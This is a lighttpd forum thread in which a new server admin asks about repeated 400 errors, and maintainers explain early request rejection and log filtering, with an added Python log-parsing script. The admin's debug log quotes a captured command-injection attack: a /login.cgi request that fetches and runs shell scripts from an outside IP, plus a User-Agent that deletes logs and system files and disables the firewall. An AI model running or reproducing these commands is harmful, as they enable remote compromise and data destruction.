Blocking bad requests (spam I guess or something else)

Added by MapHtH over 4 years ago

Hi guys,

could anyone help me to block requests like:

156.198.161.145 - - [03/Nov/2019:12:07:50 +0100] "  " 400 345 "-" "-" 
156.196.25.3 - - [03/Nov/2019:12:13:17 +0100] "  " 400 345 "-" "-" 

I've tried with adding this to conf, but it still doesn't filter them out:

$HTTP["request-method"] !~ "^(GET|POST|HEAD)$" {
    url.access-deny = ( "" )
    accesslog.filename = "/tmp/lighttpd/spam.log"
}

Those requests are repeating every few minutes of the day, and I have no idea what they are. I'm a bit new to lighttpd and web servers so if anyone knows what this is, please tell me. All the IPs are from Egypt.

Thanks


Replies (5)

RE: Blocking bad requests (spam I guess or something else) - Added by stbuehler over 4 years ago

Hi,

to me the access log looks like they are already "blocked" - with a "400 Bad Request" response. Of course theoretically a "400" response can also be sent by a backend, but then the log should at least contain a valid request path.

RE: Blocking bad requests (spam I guess or something else) - Added by gstrauss over 4 years ago

Bad requests are rejected early in request processing, before any conditional config processing. To be more direct, if an HTTP request is rejected due to parsing errors, lighttpd skips conditional config processing, such as $HTTP["request-method"], since even that might not be valid. The configuration in the global scope is used, including for logging.

To see what these requests are, you can set debug.log-request-header-on-error = "enable" in the global scope, and then restart lighttpd. If you get these requests every few minutes, then you'll have your answer in the lighttpd error log after a few minutes, and then you should probably disable the debugging and restart lighttpd again.

If you have a (small) set of IPs which only send bad requests (and do not send any valid requests), you might consider blocking them in your firewall. However, for a few bad requests every few minutes, I would suggest ignoring the "problem", and perhaps filtering them out of your logs when doing log analysis. After all, that's what you are attempting to do above to prevent them from getting into your other access log(s).
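The log filtering and per-client tally suggested above, as an added example (not code from this thread or from the lighttpd project): a small Python script that parses lighttpd's default access-log format, drops the entries lighttpd rejected at the parsing stage (status 400 with a request line that is not a valid "METHOD target HTTP/x.y"), and lists clients that only ever sent such requests, which are the candidates for a firewall rule. The sample log lines are constructed for the example; the two 156.x addresses come from the thread, the others are documentation addresses.

```python
import re
from collections import defaultdict

# Constructed sample access log (not taken from the thread) in lighttpd's default
# accesslog format: client ident user [time] "request line" status bytes "referer" "user-agent".
SAMPLE_LOG = """\
156.198.161.145 - - [03/Nov/2019:12:07:50 +0100] "  " 400 345 "-" "-"
203.0.113.7 - - [03/Nov/2019:12:08:01 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
156.196.25.3 - - [03/Nov/2019:12:13:17 +0100] "  " 400 345 "-" "-"
203.0.113.7 - - [03/Nov/2019:12:14:02 +0100] "GET /missing HTTP/1.1" 404 345 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Nov/2019:12:15:30 +0100] "GET /login.cgi?cli=x HTTP/1.1" 400 345 "-" "-"
198.51.100.9 - - [03/Nov/2019:12:16:00 +0100] "GET / HTTP/1.1" 200 512 "-" "curl/7.64"
"""

# One access-log line; the request line is whatever sits between the first pair of quotes,
# which for a rejected request may be blank or just spaces.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# A request line lighttpd would have parsed successfully: METHOD SP target SP HTTP/x.y
REQUEST_LINE_RE = re.compile(r'^(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH) \S+ HTTP/\d\.\d$')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not in the expected format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def is_malformed(entry):
    """True for entries lighttpd rejected before routing: a 400 whose request line never parsed."""
    return entry["status"] == 400 and REQUEST_LINE_RE.match(entry["request"]) is None


def filter_log(text):
    """Split a log into (lines worth analysing, rejected-request entries)."""
    kept, rejected = [], []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is not None and is_malformed(entry):
            rejected.append(entry)
        else:
            kept.append(line)  # valid requests and unparseable lines both stay for analysis
    return kept, rejected


def bad_only_clients(text):
    """Map client IP -> number of malformed requests, for clients that sent nothing else."""
    kept, rejected = filter_log(text)
    good_ips = {e["ip"] for e in map(parse_line, kept) if e is not None}
    counts = defaultdict(int)
    for entry in rejected:
        counts[entry["ip"]] += 1
    # A client that also sent well-formed requests is not a firewall candidate.
    return {ip: n for ip, n in counts.items() if ip not in good_ips}


if __name__ == "__main__":
    kept, rejected = filter_log(SAMPLE_LOG)
    print(f"{len(kept)} lines kept, {len(rejected)} malformed requests dropped")
    for ip, n in sorted(bad_only_clients(SAMPLE_LOG).items()):
        print(f"{ip}: {n} malformed request(s), no valid ones")
```

Run it against the real log with `python3 filter.py < /var/log/lighttpd/access.log` after replacing SAMPLE_LOG with `sys.stdin.read()`. Note that a 400 with a well-formed request line (the 198.51.100.9 entry) is deliberately kept: it reached request processing, so it may have come from a backend and is worth looking at rather than filtering out.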

RE: Blocking bad requests (spam I guess or something else) - Added by MapHtH over 4 years ago

Thanks for the tips.

I've enabled the debug and it's the same for every entry:

197.57.32.123 - - [03/Nov/2019:21:20:00 +0100] "  " 400 345 "-" "-" 

and the debug log shows this:

2019-11-03 21:20:00: (request.c.407) overlong request line; extra space -> 400 
2019-11-03 21:20:00: (connections.c.794) request-header:\nGET /login.cgi?cli=aa ;wget http://157.245.173.210/824982536/dlink -O /tmp/cc ;sh /tmp/cc ;wget http://157.245.173.210/824982536/dlink2 -O /tmp/dd ;sh /tmp/dd HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Nakuma;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;\r\n\r\n 

Is this some sort of a probing attack? It looks like someone is trying to push commands, or am I wrong?

RE: Blocking bad requests (spam I guess or something else) - Added by gstrauss over 4 years ago

It is not a probe. It is a script-kiddie attack. Congratulations, you're the first one on the internet to see it. (jk. no you're not)

RE: Blocking bad requests (spam I guess or something else) - Added by MapHtH over 4 years ago

Oh, thanks for the info.

I'm new to running a web server.
I'll look into what I can do to stop this since it is slightly annoying. Since it seems that all the requests come from Egypt, I'll try blocking the country :P
